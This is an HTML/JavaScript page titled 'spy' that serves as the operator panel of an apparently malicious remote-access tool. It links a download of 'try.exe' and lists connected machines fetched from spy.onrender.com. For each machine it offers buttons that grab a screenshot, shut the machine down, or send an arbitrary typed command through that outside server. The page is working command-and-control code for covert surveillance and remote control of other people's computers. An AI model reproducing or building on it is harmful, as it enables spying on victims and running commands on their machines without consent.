<!DOCTYPE html>

<html>
    <head>

        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>spy</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="">
        
    </head>
    <style>
        #shit{
            text-align: center;
        }
        .Centerdiv {
            text-align: center;
            /* background-color: red; */
            /* display: inline-block; */
        }
        .Centerdiv div {
            margin: 1rem 0.5rem;
        }
        .Centerdiv span {
            margin: 0 0.5rem;
        }
        
    </style>
    <a href="https://mindhacker1098.github.io/spy/try.exe" download="try.exe">download</a>
    <body>
        <h1 id="shit">Connections</h1>
        <div class="Centerdiv" id="damn">

           
            
            
        </div>
        <div>
<img id="img" src="">

        </div>
    
    </body>

<script>

var imurl="https://spy.onrender.com/allreq";
var count = 0;


async function lol(){
    if(count==1){ imurl="https://spy.onrender.com/imreq";}
let resp= await fetch(imurl);
count=1;
resp=await resp.json()
document.getElementById("damn").innerHTML=''
console.log(resp)
for(let i=0;i<resp.length;i++){



let btn=document.createElement("BUTTON");
btn.innerHTML="Screen";
btn.onclick=async function(){


   

    // document.getElementById("he").innerHTML=`${i}`
    await fetch(`https://spy.onrender.com/accept/${resp[i]}/get`)
    


    setTimeout(async () => {
        const response = await fetch("https://spy.onrender.com/img");
     let data = await response.blob();
     
const imageObjectURL = URL.createObjectURL(data);
      
  document.getElementById("img").src=imageObjectURL;
      
    }, 2000);
    
}

let btn2=document.createElement("BUTTON");
btn2.innerHTML="Shutdown";
btn2.onclick=async function(){


   

// document.getElementById("he").innerHTML=`${i}`
await fetch(`https://spy.onrender.com/accept/${resp[i]}/shut`)}



let inp=document.createElement("input");
inp.id=resp[i]
inp.placeholder="commands"



let btn3=document.createElement("BUTTON");
btn3.innerHTML="send";
btn3.onclick=async function(){


   

// document.getElementById("he").innerHTML=`${i}`
await fetch(`https://spy.onrender.com/accept/${resp[i]}/${document.getElementById(resp[i]).value}`)}




let s=document.createElement("SPAN")
s.innerHTML=resp[i]
let d=document.createElement("div")
d.appendChild(s)
d.appendChild(btn)
d.appendChild(btn2)
d.appendChild(inp)
d.appendChild(btn3)
document.getElementById("damn").appendChild(d)



}
lol();
}
lol();

// setInterval(() => {
    
//     lol();  
//     console.log("damn")
// },10000);





</script>

</html>